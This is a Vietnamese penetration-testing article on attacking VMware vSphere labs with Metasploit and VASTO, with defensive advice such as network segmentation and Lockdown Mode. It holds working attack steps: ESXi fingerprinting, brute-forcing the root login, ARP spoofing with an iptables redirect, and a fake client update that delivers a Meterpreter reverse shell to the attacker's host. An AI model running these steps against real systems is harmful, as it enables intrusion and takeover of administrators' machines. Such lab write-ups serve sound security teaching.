Tấn công môi trường ảo hóa Vmware vSphere

Vmware vSphere là một lớp nằm trong tổng thể môi trường mạng lưới điện toán của doanh nghiệp. Trong bài viết này tôi sẽ chia sẻ một vài mối đe dọa đối với Vmware vSphere cùng những cách thức tấn công vào môi trường điện toán đám mây.

Những năm gần đây tôi cảm thấy thật may mắn khi có cơ hội được hợp tác với một số doanh nghiệp đầu ngành của Việt Nam như Eximbank, Vinasoy, Liberty Insurance … thông qua việc cung cấp các dịch vụ đánh giá bảo mật và tư vấn chiến lược an toàn thông tin, cùng một số khóa đào tạo chuyên ngành như Ethical Hacking, Ultimate Web Hacking, CISSP…

Những công việc này tiến triển khá tốt, thời gian gần đây tôi nhận được một số yêu cầu từ phía khách hàng, nhắm đến xu hướng mới : Đánh giá bảo mật môi trường điện toán đám mây hay còn gọi là ảo hóa.

Tấn công môi trường ảo hóa Vmware vSphere

Làm việc với ảo hóa rất thú vị tuy nhiên chúng luôn luôn có một nhược điểm về mặt an ninh. Rất nhiều chuyên gia quản trị hệ thống thường “bỏ qua” việc đảm bảo an ninh trong môi trường ảo hóa VMware vSphere. Người ta mặc định suy nghĩ rằng vì ảo hóa thường được triển khai trong môi trường nội bộ nên mức độ rủi ro thấp, vấn đề đảm bảo an ninh cho Hypervisor và vCenter bị xem nhẹ một cách “đáng sợ” !

Trong bài viết này tôi mặc định rằng bạn đã có một số kiến thức cơ bản về điện toán đám mây, về Vmware vSphere, tôi sẽ không đi vào những gì VMware vSphere hay vCenter làm được, cũng như ưu điểm và khuyết điểm của công nghệ điện toán đám mây.

Chúng ta sẽ bắt đầu bài viết này bằng cách thảo luận một vài lý do như : Tại sao kiến trúc ảo hóa nên được xem như là một lớp (Layer) nằm bên trong môi trường mạng lưới điện toán, góp phần vào những cuộc tấn công môi trường điện toán tổng thể.

Trước hết phần mềm ảo hóa (virtualization software) là nền tảng cơ bản của môi trường ảo hóa (virtualized environment). Tất cả các máy chủ ảo đều phụ thuộc vào nó và khi một ai đó truy cập được vào giao diện quản lý (management interfaces), toàn bộ cơ sở hạ tầng đều có thể sẽ bị chiếm quyền kiểm soát.

Chúng ta đều hiểu rằng ảo hóa có thể được triển khai bằng nhiều cách khác nhau, trải dài từ một thiết kế đơn giản cho đến các loại hình có kiến trúc mạnh mẽ hơn và phức tạp hơn. Dù cho phức tạp đến mức độ nào chúng đều có những mối đe dọa tiềm tàng cần phải được đánh giá.

Tôi đã được “diện kiến” với những cách thiết kế kiến trúc ảo hóa tốt nhất khi hầu hết các mối nguy hiểm đều được giải quyết một cách nghiêm túc và ngược lại tôi cũng đã “tiếp xúc” với những kiểu thiết kế kiến trúc vô cùng cẩu thả, nơi mà chúng ta có thể dễ dàng bị chiếm quyền truy cập bởi từ bất kỳ ai.

Lấy ví dụ, việc sử dụng Shodan tại http://www.shodanhq.com. Nếu bạn chưa biết đến Website này, bạn nên dành thời gian tìm hiểu về những khả năng khá “kinh hoàng” đằng sau hệ thống ấn tượng này. Một lời giải thích đơn giản nó chính là công cụ tìm kiếm máy chủ (Server Search Engine).

Ở Hình 1, bạn sẽ thấy một truy xuất tìm kiếm đơn giản về “VMware Esx”.

Hình 1 : Khung tìm kiếm của Shodan
Hình 1 : Khung tìm kiếm của Shodan
Hình 2 : Kết quả tìm kiếm của Shodan
Hình 2 : Kết quả tìm kiếm của Shodan

Đây là danh sách các máy chủ được kết nối trực tiếp ra Internet và Shodan đã tìm thấy chúng. Quả thật đáng sợ ! Không một chút bảo mật nào phải không ? Một trong số các hệ thống này có thể chứa những máy chủ dành cho việc phát triển ứng dụng, cơ sở dữ liệu, mức độ tiếp xúc “trần trụi” như thế này không phải là một ý kiến hay ! Khi ta dùng trình duyệt để truy cập đến một trong những địa chỉ IP trong danh sách trên, ta sẽ thấy dữ liệu đưa ra như Hình 3.

Hình 3 : Máy chủ đang vận hành ESXi 5 được tìm thấy bởi Shodan
Hình 3 : Máy chủ đang vận hành ESXi 5 được tìm thấy bởi Shodan

Trông quen phải không ! Tôi nghĩ họ đang “mời gọi” chúng ta hãy khai thác vào điểm yếu an ninh của họ. Tôi đùa ! Đó thực sự là hành vi bất hợp pháp vì thế chúng ta chỉ nên xem thôi, đừng thực hành nhé các bạn. Có hàng trăm mối nguy hiểm liên quan đến môi trường VMware, chẳng hạn tấn công vào Hypervisor, Vcenter, Update Manager, Data Recovery … và nhiều thứ khác.

Tôi muốn các bạn xem qua thống kê về những cuộc tấn công trực diện vào máy chủ ESXi 4.x ở Hình 4.

Hình 4 : Những mối đe dọa đối với ESXi 4.x
Hình 4 : Những mối đe dọa đối với ESXi 4.x

Khi nhìn vào số liệu thống kê từ Secunia, ta thấy rằng hai kết quả đầu tiên là System Access và DoS, System Access trên ESXi có nghĩa là cho phép kẻ tấn công truy cập vào tất cả mọi thứ trên môi trường ảo hóa. Còn vCenter, hãy nhìn vào Hình 5 và 6.

Hình 5 : Những mối đe dọa đối với vCenter 4.x
Hình 5 : Những mối đe dọa đối với vCenter 4.x
Hình 6 : Những mối đe dọa đối với vCenter 5.x
Hình 6 : Những mối đe dọa đối với vCenter 5.x

Như bạn thấy, sự tàn phá của những cuộc tấn công đối với vCenter thật kinh khủng. Hãy nhớ đến vụ cướp tín dụng tồi tệ nhất đã từng xảy ra trong lịch sử, vào khoảng năm 2006 – 2008, bản cáo trạng 20 năm tù cho Hacker Gonzalez, đó là một vụ tấn công vào môi trường ảo hóa !
Cuộc tấn công được thực hiện với mục tiêu là các hệ thống đang vận hành ESX. Sau khi chiếm được quyền truy cập, Gonzalez đã cài đặt Rootkit vào máy chủ ESX để đánh cắp thông tin các tài khoản Credit Card, thông qua kỹ thuật nghe lén (sniffing) và thu thập lưu lượng dữ liệu đến từ nhiều máy chủ SQL cùng một lúc, hậu quả là từ 140 đến 180 triệu thẻ tín dụng đã bị anh ta đánh cướp. Sự việc này đã làm dấy lên hồi chuông cảnh báo cần phải kiện toàn an ninh kiến trúc ảo hóa một cách bài bản.

Những sai lầm thường gặp khi triển khai môi trường  ảo hóa

Một trong những sai lầm phổ biến nhất khi triển khai VMware vSphere là gì ? Sai lầm phổ biến, thường xuyên xảy ra và nghiêm trọng nhất chính là việc không phân tách phân vùng mạng (Network Segmentation) nhằm tách các máy chủ Management ra khỏi vùng mạng chung.

Hình 7 là ảnh chụp một mô hình mạng được sử dụng để cho thấy các phương pháp phổ biến trong khi triển khai mạng ảo hóa. Chú ý : Mô hình ảo hóa này không sử dụng VLAN. Trong môi trường ảo hóa này, máy ảo sẽ được phép truy cập đến tất cả các máy khác nằm trong mạng lưới. Không, chuyện này không nên diễn ra như thế !

 Hình 7 : Mô hình sơ đồ mạng vSphere thông thường
Hình 7 : Mô hình sơ đồ mạng vSphere thông thường

Thậm chí ngay cả khi chúng ta đã phân tách phân vùng mạng bằng cách sử dụng VLAN và vShield zones, ta vẫn còn mắc sai lầm. vCenter Administrator truy cập vào Management Network bằng cách nào ? Đây là sai lầm mà tôi thường gặp nhất. Nó làm tôi thật sự ngạc nhiên khi có quá nhiều công ty bỏ qua các giai đoạn kiện toàn an ninh trong khi triển khai ảo hóa.

Họ chú trọng vào việc kiện toàn mạng lưới và hệ thống máy chủ Windows nhưng lại bỏ qua kiện toàn an ninh ảo hóa. Có bao nhiêu công ty đăng nhập bằng tài khoản root vào Hypervisor và dùng loại mật khẩu mà mọi người dùng khác đều có thể đoán ra được (123456, password, anhyeuem, emyeuanh) ?

Đọc đến đây các bạn có nghĩ tôi đang đùa không ? Thật không may là tôi không thích đùa, sai lầm phổ biến này thường xuyên xảy ra ngay cả khi nó nằm trong các chính sách an ninh bắt buộc phải tuân thủ.

Tấn công môi trường ảo hóa vSphere Environment

Phần còn lại của bài này tôi sẽ tập trung chia sẻ những cách tấn công vào môi trường ảo hóa vSphere bằng nền tảng Metasploit. Một trong số các Modules tốt nhất dùng để tấn công trực tiếp vào môi trường ảo hóa vSphere, được viết bởi Claudio Criscione và nhóm của anh ta.

Nghiên cứu và phát triển của Claudio Criscione thật sự rất tuyệt, nó cung cấp cho chúng ta cách thức đơn giản để sử dụng Exploits, giúp tối đa hóa khả năng khai thác thành công của chúng ta. Một trong các Auxiliary modules có thể giúp ta tải Virtual Machines trực tiếp từ một máy chủ ESX 3.5 mà không cần thông tin xác thực.

Cá nhân tôi thích nhất Exploit module mà cho phép chúng ta có thể đánh cắp được ID SOAP của một tài khoản quản trị vCenter 4.x và sau đó “dạo chơi” bằng phiên làm việc của tài khoản quản trị này, không cần bất cứ thứ gì trừ việc truy cập vào vCenter ! Auxiliary modules của Claudio tên là VASTO (Virtualization Assessment Toolkit). Bạn có thể tải tại : http://vasto.nibblesec.org

Sau khi đã tải Auxiliary module này, bạn chép thư mục vasto vào thư mục Auxiliary của Metasploit. Hình 8 mô tả đường dẫn thư mục trong Backtrack 5.

Hình 8 : Đường dẫn thư mục Metasploit
Hình 8 : Đường dẫn thư mục Metasploit

Đây là lúc ta cần sử dụng Auxiliary module để dò quét và khai thác môi trường vSphere. 2 thực nghiệm tấn công đều sử dụng các modules được cung cấp trong Metasploit Framework 4.2.

Đảm bảo rằng bạn đã cập nhật Metasploit của mình lên phiên bản mới nhất : msfupdate hoặc svn update. Khi Metasploit đã có đầy đủ các Auxiliary modules, chúng ta đã có thể bắt đầu sử dụng chúng. Thực nghiệm tấn công đầu tiên chúng ta sẽ sử dụng VMware Fingerprint Module. Sau khi khởi chạy Metasploit trong giao diện Console, ta gõ dòng lệnh sau vào :

msf > use auxiliary/scanner/vmware/esx_fingerprint

Chi tiết về Module thể hiện ở Listing 1 :

Tấn công môi trường ảo hóa Vmware vSphere

Mô tả

Module này sẽ truy xuất vào Web API Interfaces của các máy chủ VMware ESX/ESXi để nhận dạng Version của máy chủ đó. Mục đích để làm gì ? Module này được tạo ra để tìm những máy chủ thật sự đang vận hành trong mạng, đồng thời nhận biết chính xác Version và Build Number. Bạn có thể nhập vào dãy địa chỉ IP hoặc 1 địa chỉ. Trong ví dụ ở đây, ta đang tìm kiếm thông tin của một máy chủ cụ thể đã được quét bằng NMAP.

Giống như các Module khác, ta cần thiết lập Remote Host (RHOST) cho máy chủ mà chúng ta đang dò quét, khi nhìn vào Listing 1 ta thấy có ba tham số bắt buộc phải được thiết lập : RHOST, RPORT và THREADS.

Hai trong ba yêu cầu trên đã được thiết lập chuẩn cho môi trường làm việc của ta. Tiếp theo ta sẽ thiết lập RHOST và cho tiến hành chạy module :

msf auxiliary(esx_fingerprint) > set RHOST 192.168.3.212
RHOST => 192.168.3.212
Msf auxiliary(esx_fingerprint)  > exploit

Giờ ta biết chính xác những gì ta đang tấn công.

[+] [2013.04.26-10 :16 :47] Identified VMware ESXi 5.0.0 build-623860
[*] [2013.04.26-10 :16 :47] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(esx_fingerprint) >

Module này sử dụng port 443 và nếu bạn đọc thử mã nguồn của Module tại :

$METASPLOIT_HOME/modules/auxiliary/scanner/VMware/esx_fingerprint.rb

Bạn có thể tìm thấy sự kết hợp đường dẫn sdk đến kết nối https. Phương thức chung luôn luôn sẵn có với file wsdl được trình bày trong Hình 9

Hình 9 : vimService.wsdl
Hình 9 : vimService.wsdl

Giờ ta đã xác định được thông tin về máy chủ và phiên bản VMware, nhìn vào đó chúng ta có thể đoán trước được khả năng khai thác thành công. Có khá nhiều sự lựa chọn; tuy nhiên chúng ta  sẽ thử phương pháp dùng Metasploit để Bruteforce tài khoản đăng nhập vào ESXi!

Metasploit đã cung cấp một module để Bruteforce tài khoản cục bộ (Local Account). Module này sẽ sử dụng bộ từ điển chứa user/pass (dictionary) để tiến hành bẻ khóa, bạn có thể dùng Dictionary của riêng mình hoặc dùng Dictionary sẵn có trong Metasploit tại đường dẫn sau “$METASPLOIT_HOME/data/wordlist/”. Hãy nhìn vào Listing 2 :

Tấn công môi trường ảo hóa Vmware vSphere

Có sáu thiết lập bắt buộc bạn cần phải cài đặt để tiến hành tấn công Bruteforce, thêm một số thiết lập khác mà ta cần thay đổi. Việc cần thay đổi đầu tiên là vô hiệu hóa tùy chọn sử dụng mật khẩu rỗng (Blank Password):

msf auxiliary(vmauthd_login) > set BLANK_PASSWORDS false
BLANK_PASSWORDS => false

Tại sao lại vô hiệu hóa tùy chọn sử dụng mật khẩu rỗng ? Nhìn vào kết quả thu thập được từ Footprinting module, có thể thấy rằng mục tiêu đang sử dụng phiên bản ESXi 5. Trong phiên bản 5, bắt buộc ta phải nhập mật khẩu vào quá trình cài đặt, vì vậy khả năng khai thác thành công mật khẩu rỗng gần như rất thấp.

Nếu mục tiêu của chúng ta sử dụng ESXi 4.1, phiên bản này không yêu cầu nhập mật khẩu trong quá trình cài đặt, cho nên lúc này chúng ta sẽ dùng đến khả năng kiểm tra mật khẩu rỗng. Tốc độ Bruteforce (Bruteforce Speed) là một thiết lập bắt buộc tiếp theo, mặc định nhanh nhất của thiết lập là giá trị 5.

Thiết lập này tốt cho trường hợp thực nghiệm của tôi, nhưng đối với các môi trường khác cần điều chỉnh lại cho phù hợp. Kế tiếp, chúng ta cần thiết lập RHOSTS (Địa chỉ IP mục tiêu của chúng ta) :

msf auxiliary(vmauthd_login) > 
set RHOSTS 192.168.2.212
RHOSTS => 192.168.2.212

Việc cuối cùng chúng ta cần làm là xác định “Username” mà chúng ta sẽ dùng để tấn công, trong bài Lab này chúng tôi sẽ sử dụng Username là root, cùng với danh sách mật khẩu của riêng Metasploit :

msf auxiliary(vmauthd_login) > set USERNAME root
USERNAME => root

Bây giờ hãy bấm nút và xem thử chúng tôi tìm thấy được điều bất ngờ gì nhé ! (Listing 3). Chúng tôi đã tìm ra tên người dùng và mật khẩu hợp lệ ! (Nghe đơn giản quá nhỉ).

Listing 3 : Kết quả Bruteforce

msf  auxiliary(vmauthd_login) > exploit
[*] [2013.04.26-10:31:39] 192.168.3.212:902 Banner: 220 VMware Authentication Daemon Version 1.10: SSL Required, ServerDaemonProtocol:SOAP, MKSDisplayProtocol:VNC , VMXARGS supported
[*] [2013.04.26-10:31:39] 192.168.3.212:902 Switching to SSL connection…
[-] [2013.04.26-10:31:42] 192.168.3.212:902 vmauthd login FAILED – root:root
[-] [2013.04.26-10:31:43] 192.168.3.212:902 vmauthd login FAILED – root:123456
[-] [2013.04.26-10:31:45] 192.168.3.212:902 vmauthd login FAILED – root:12345
[-] [2013.04.26-10:31:48] 192.168.3.212:902 vmauthd login FAILED – root:123456789
[+] [2013.04.26-10:31:48] 192.168.3.212:902 vmauthd login SUCCESS – root:password

Như những gì mong đợi, Metasploit thực hiện điều này quá dễ dàng ! Tất nhiên đây chỉ là điều dễ dàng diễn ra trong môi trường thử nghiệm, một hệ thống được kiện toàn đúng sẽ ngăn chặn được các cuộc tấn công này xảy ra.

Thứ nhất, mạng lưới cần phải được phân tách. Thứ hai, dù cho tôi có là người trong cùng Management Network, tôi cũng không thể nào thực hiện được loại tấn công Bruteforce này, nếu chế độ Lockdown được kích hoạt trên từng máy chủ!

Đọc tới đây chắc chắn sẽ có bạn thắc mắc “Chế độ Lockdown là gì?”. Sau khi máy chủ được kết nối với vCenter, chúng ta có thể kích hoạt chế độ Lockdown giúp ngăn chặn các phiên đăng nhập mới diễn ra trên máy chủ. Do đó sẽ vô hiệu hóa được loại hình tấn công Bruteforce, bởi vì việc tạo mới phiên đăng nhập sẽ không được cho phép.

Bạn có thể kích hoạt chế độ Lockdown qua thẻ Configuration của máy chủ trong vCenter : Configuration>Security Profile> Lockdown Mode>Edit.

Tấn công môi trường ảo hóa Vmware vSphere

Nếu bạn đang lo lắng : “Lỡ trong trường vCenter có vấn đề, mất kết nối với máy chủ thì làm sao?” … Đừng lo, bạn có thể bật/tắt chế độ Lockdown từ DCUI (Hình 11).

Tấn công môi trường ảo hóa Vmware vSphere

Chúng ta sẽ tìm hiểu tiếp một trong các Modules khác được cung cấp bởi VASTO. Lần này tôi sẽ chọn tấn công trực tiếp vào mục tiêu “vSphere Administrator” bằng cách sử dụng kỹ thuật tấn công Man-in-the-middle. Trong phần tấn công này, tôi sẽ sử dụng VIlurker, một auxiliary module của VASTO. Cuộc tấn công này sẽ nhắm đến quá trình truyền tải lưu lượng giữa vSphere Client và vCenter hoặc Host.

vSphere Client sẽ hỏi vCenter hoặc Host “Phiên bản mới nhất của vSphere Client là bao nhiêu?” Nếu có một phiên bản mới được cập nhật, Client sẽ được cho biết đường dẫn để tải về và có thể cập nhật ngay lập tức. Sau đây là các địa chỉ IP dành cho đợt tấn công này :

IP của Hacker : 192.168.130.151
IP của nạn nhân: 192.168.130.95
IP của máy chủ ESXi: 192.168.130.13

Bởi vì đây là cuộc tấn công MiTM nên tôi bắt buộc phải can thiệp vào lưu lượng truyền tải giữa nạn nhân và máy chủ ESXi. Tôi sẽ sử dụng arpspoof :

[root@fedora metasploit]# arpspoof -i p4p1 -t 192.168.130.95 192.168.130.13

Tôi cũng sẽ chuyển hướng kết nối mạng cho quá trình tấn công với câu lệnh iptables như sau :

[root@fedora metasploit]# iptables -t nat -A PREROUTING -d 192.168.130.13 -p tcp –dport 443 -j DNAT –to-destination 192.168.130.151:443

Tới thời điểm này tôi đang tiến hành đánh chặn (intercepting) và định tuyến lại lưu lượng truyền tải, tiếp theo là bắt tay vào cho chạy module VIlurker

Tấn công môi trường ảo hóa Vmware vSphere

Mô tả

Module này sẽ thực hiện tấn công đối với môi trường cơ sở hạ tầng ảo hóa hoặc vSphere Client. VI Client sẽ bị đánh lừa để tải về bản cập nhật giả mạo (fake update), thực thi dưới thông tin xác thực của người dùng. Có Metasploit payload ở đây không ? Có, tôi sẽ sử dụng loại Payload phổ biến nhất của Metasploit để chiếm quyền kiểm soát máy chủ Windows, Meterpreter Payload. Có một vài cấu hình tôi cần thiết lập trước khi tiến hành khai thác

Tấn công môi trường ảo hóa Vmware vSphere

Tôi sẽ sử dụng phương thức Reverse TCP thay vì Bind TCP. Với phương thức Reverse TCP, tôi sẽ yêu cầu nạn nhân tự động kết nối đến mình thay vì phải mở Port để tôi kết nối đến máy nạn nhân (Listing 6).

Sau khi tất cả các cấu hình đã được thiết lập, tôi bắt đầu cho tiến hành khai thác, Exploit thôi nào ! Việc tiếp theo là ngồi yên, pha một ly cà phê nóng, ăn miếng bánh ngọt nhâm nhi thưởng thức chờ đợi Administrator kết nối đến !

Listing 6 : Cấu hình VILurker

{jb_bluebox}msf  auxiliary(vmware_vilurker) > set RPORT 6565
RPORT => 6565
msf  auxiliary(vmware_vilurker) > exploit
[*] Auxiliary module execution completed
[*] [2013.04.26-15:49:58] Server started.
msf  auxiliary(vmware_vilurker)

Nhìn vào bảng ghi chú dưới đây bạn sẽ thấy có một kết nối vừa được thiết lập và vSphere Client đang yêu cầu tập tin “Clients.xml”. VIlurker sẽ thay mặt cho tôi cung cấp tập tin này :

Listing 7 : VILurker đang tấn công

[*] [2013.04.26-15:50:09] VIlurker – 192.168.130.95 is asking for clients.xml. Triggering VIlurker
[*] [2013.04.26-15:50:09] answering HTTP/1.1 200 Ok
Host: 192.168.130.151
Content-Type: text/xml
Content-Length: 266
Connection: Close
<ConfigRoot>
<clientConnection id=”0000″>
<authdPort>902</authdPort>
<version>10</version>
<patchVersion>10.0.0</patchVersion>
<apiVersion>10.0.0</apiVersion>
<downloadUrl>https://*/client/VMware-viclient.exe</downloadUrl>
</clientConnection>
</ConfigRoot>

Tiếp theo, Administrator sẽ bấm nút “Yes” để cập nhật vSphere Client và tôi sẽ “thấy” như sau trên console của mình :

[*] [2013.04.26-15:50:11] VIlurker – Bingo 192.168.130.95 is asking for the update. Creating the exploit
[*] [2013.04.26-15:50:11] VIlurker – Creating payload…
[*] [2013.04.26-15:50:11] Executing /opt/metasploit/msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.130.151 LPORT=6567 X > /root/.msf4/modules/auxiliary/vasto/data/lurker.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {“LHOST”=>”192.168.130.151”, “LPORT”=>”6567”}
[*] [2013.04.26-15:50:19] 192.168.130.95 uploading exploit
[*] [2013.04.26-15:50:19] VIlurker – Saving session information on the DB

Tôi sẽ cấu hình Handler để chấp nhận kết nối đến từ phía Administrator :

msf  auxiliary(vmware_vilurker) > use exploit/multi/handler
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LPORT 6567
LPORT => 6567
msf  exploit(handler) > set LHOST 192.168.130.151
LHOST => 192.168.130.151
msf  exploit(handler) > exploit

Tuyệt vời, lúc này đây có thể nói tôi đã thiết lập thành công kịch bản tấn công MiTM, đánh lừa vSphere Administrator rằng có một bản cập nhật mới cho vSphere Client.

Sau khi Administrator đồng ý bấm nút “Yes” để cập nhật, gói cập nhật giả mạo sẽ được gửi đến và Administrator phải đồng ý cho cài đặt bản cập nhật, các quản trị viên thường luôn luôn đồng ý vì cập nhật là điều tuyệt vời ! Hình 12 là những gì mà Administrator sẽ nhìn thấy trong giai đoạn này :

Tấn công môi trường ảo hóa Vmware vSphere

Administrator sẽ cài đặt bản cập nhật mà trên thực tế nó chính là Meterpreter payload. Sau khi hoàn tất việc cài đặt, Administrator sẽ tiếp tục công việc của mình, kết nối đến vCenter mà không nhận thấy có bất kỳ điều gì khác thường đã diễn ra. Là một kẻ tấn công, tôi sẽ thấy như sau :

[*] [2013.04.26-15:51:59] Sending stage (752128 bytes) to 192.168.130.95
[*] Meterpreter session 1 opened (192.168.130.151: 6567 -> 192.168.130.95:2980) at 2013-04-26
15:52:01 +0200

Có thể nói giờ đây tôi đã chiếm toàn quyền kiểm soát máy tính của vSphere Administrator. Tất nhiên, đây chỉ là một trong số nhiều kịch bản tấn công, khi chúng tôi tiến hành đánh giá bảo mật môi trường ảo hóa.

Để ngăn chặn loại tấn công này, bạn nên cân nhắc đến cách mà quản trị viên kết nối với cơ sở hạ tầng ảo hóa, nếu bạn không thể đáp ứng việc phân tách mạng lưới riêng biệt, ít nhất bạn phải chú ý đến các bản cập nhật mà bạn đã áp dụng cho vCenter hoặc máy chủ. Bài viết này có thể chỉ cung cấp đủ một chừng mực thông tin nào đó để các bạn có thể tiến hành thử nghiệm tấn công đối với môi trường ảo hóa VMware.

Có rất nhiều kinh nghiệm, kiến thức mà chúng tôi (DNA Media Team) muốn chia sẻ với các bạn. Vì điều đó nên chúng tôi đã quyết định đều đặn hàng tháng sẽ viết 4 bài về an toàn thông tin, tất cả đều được chia sẻ miễn phí và hoàn toàn bằng tiếng việt. Có 2 bài dành cho các bạn đang làm việc với vai trò nghiên cứu kỹ thuật (Chuyên trang Pentest), 2 bài còn lại dành cho các bạn đang điều hành quản lý an toàn thông tin (Chuyên trang CSO).

Rất mong nhận được sự phản hồi đóng góp ý kiến của tất cả các bạn để chúng tôi có thể hoàn thiện, chỉnh chu hơn về nội dung, bố cục, độ dài của bài viết.

Chúng tôi mong muốn có thể đóng góp một phần nhỏ nào đó cho cộng đồng an toàn thông tin của Việt Nam, tất cả là vì tinh thần dân tộc. Thay vì phản đối tiêu cực với tình hình an ninh của đất nước nói chung và an ninh mạng nói riêng qua những hoạt động tấn công chiến tranh mạng, chúng ta hãy cùng nhau chia sẻ kinh nghiệm sẽ hay hơn so với việc mỗi người giữ riêng kiến thức cho bản thân mình.

dnasecurity